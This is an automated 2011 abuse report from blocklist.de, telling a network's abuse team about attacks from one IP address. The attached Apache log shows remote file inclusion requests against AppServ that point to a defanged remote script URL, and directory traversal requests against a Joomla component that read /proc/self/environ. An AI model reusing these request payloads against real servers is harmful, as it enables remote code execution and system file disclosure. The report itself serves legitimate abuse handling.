Return-Path:
X-Original-To: gesendet@abuse.customer-config.de
Delivered-To: gesendet@abuse.customer-config.de
Received: by server5.customer-config.de (Postfix, from userid 0) id 99D0A18018EB; Thu, 24 Mar 2011 14:22:09 +0100 (CET)
To: "abuse@xxx.tld"
Subject: [noreply] abuse report about 82.1xx.xx.xxx - Thu, 24 Mar 2011 14:21:53 +0100 -- service: rfi-attack (First x 1) RID: 816068
MIME-Version: 1.0
Reply-To: "Abuse-Team"
From: "Abuse-Team (auto-generated)"
Sender: xx@blocklist.de
X-Mailer: blocklist.de
Errors-To: autogenerated@blocklist.de
Auto-Submitted: auto-generated
Content-Transfer-Encoding: 7bit
Content-Type: multipart/mixed; boundary="Abuse-5f7d1cd5efcad5ef7e76d82889637d2f";
X-Arf: yes
X-Report-ID: 816068
Message-Id: <20110324132209.99D0A18018EB@server5.customer-config.de>
Date: Thu, 24 Mar 2011 14:22:09 +0100 (CET)

--Abuse-5f7d1cd5efcad5ef7e76d82889637d2f
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=utf8;

Hello Abuse-Team,

your Server with the IP: 82.1xx.xx.xxx has attacked one of our servers/partners on the service: "rfi-attack" on Time: Thu, 24 Mar 2011 14:21:53 +0100.
The IP was automatically blocked for more than 10 minutes. To block an IP, it needs 3 failed Logins, one match for "invalid user" or a 5xx-Error-Code (eg. Blacklist)!

Please check the machine behind the IP 82.1xx.xx.xxx (server.xxx.com) and fix the problem.

Search for AS-Number/IPs from you, look at http://www.blocklist.de/en/search.html?as=29650

You can parse this Mail with X-ARF-Tools from http://www.x-arf.org/tools.html e.g. validatexarf-php.tar.gz.
You found more Information about X-Arf under http://www.x-arf.org/specification.html

This mail will be resent after one day if more attacks are recognized.

In the attachment of this mail you can find the original protocols of our systems.

To pause this message for one week, you can insert the IP and e-mail address to our Blocklist.
If more attacks of your network are recognized after the pause of seven days, the block will be canceled and you will get new reports.
http://www.blocklist.de/en/search.html?ip=82.1xx.xx.xxx&email=abuse@xxx.tld

We found your address in the Whois-Data from the IP under the SearchString "abuse-mailbox"
Answer us to rewrite the address (to abuse-quiet or a special address) for all upcoming reports.

------------------------------
Abuse-Team

This message was sent automatically, please answer us for Questions or go to:
http://www.blocklist.de/en/contact.html
------------------------------

--Abuse-5f7d1cd5efcad5ef7e76d82889637d2f
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=utf8; name="report.txt";

---
Reported-From: autogenerated@blocklist.de
Category: abuse
Report-Type: login-attack
Service: rfi-attack
Version: 0.1
User-Agent: Fail2BanFeedBackScript blocklist.de V0.1
Date: Thu, 24 Mar 2011 14:21:53 +0100
Source-Type: ip-address
Source: 82.1xx.xx.xxx
Port: 80
Report-ID: 816068@blocklist.de
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.1.json
Attachment: text/plain

--Abuse-5f7d1cd5efcad5ef7e76d82889637d2f
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=utf8; name="logfile.log";

Timezone +0100 (CET)
Lines containing IP:82.1xx.xx.xxx in /var/log/apache/pucorp.org.log

82.1xx.xx.xxx - - [22/Mar/2011:10:36:40 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160886 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:36:41 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:36:46 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 500 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:44:58 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:44:59 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153691 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:45:00 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:52 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:53 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:54 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:57 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:58 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:10:48:59 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:09 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:10 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:11 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:21 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160873 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:22 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:32:24 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:01 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160886 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:03 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:04 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:45 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:46 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:38:48 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:39:36 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:39:37 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:39:38 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168213 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
82.1xx.xx.xxx - - [22/Mar/2011:11:41:57 +0100] "GET //appserv/main.php?appserv_root=test?? HTTP/1.1" 200 160888 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:41:58 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x2.jpg?? HTTP/1.1" 200 153693 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [22/Mar/2011:11:41:59 +0100] "GET //appserv/main.php?appserv_root=hxxp://www.faclip.ir/shop/n0x3.jpg?? HTTP/1.1" 200 168212 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
82.1xx.xx.xxx - - [24/Mar/2011:14:20:33 +0100] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 151342 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
82.1xx.xx.xxx - - [24/Mar/2011:14:21:53 +0100] "GET //index2.php?option=com_rwcards&controller=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 152246 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"

--Abuse-5f7d1cd5efcad5ef7e76d82889637d2f--